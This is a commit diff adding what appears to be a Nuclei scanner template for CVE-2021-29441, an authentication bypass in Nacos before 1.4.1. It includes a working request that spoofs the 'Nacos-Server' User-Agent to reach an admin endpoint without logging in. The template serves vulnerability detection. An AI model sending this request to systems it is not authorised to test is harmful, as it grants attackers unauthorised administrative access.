Add CVE-2021-29441

cves/2021/CVE-2021-29441.yaml

@@ -0,0 +1,34 @@
+id: CVE-2021-29441
+
+info:
+  name: Nacos prior to 1.4.1 Authentication Bypass
+  description: |
+    In Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true)
+    Nacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that
+    enables Nacos servers to bypass this filter and therefore skip authentication checks.
+    This mechanism relies on the user-agent HTTP header so it can be easily spoofed.
+    This issue may allow any user to carry out any administrative tasks on the Nacos server.
+  author: dwisiswant0
+  severity: high
+  reference: https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/
+  tags: nacos,auth-bypass,cve,cve2021
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/nacos/v1/ns/instance/list?serviceName=1337"
+    headers:
+      User-Agent: "Nacos-Server"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "application/json"
+        part: header
+      - type: regex
+        regex:
+          - "\"hosts\":\\[.*?\\],\"name\":\".*?@1337\",\"clusters\":\".*?\""
+        part: body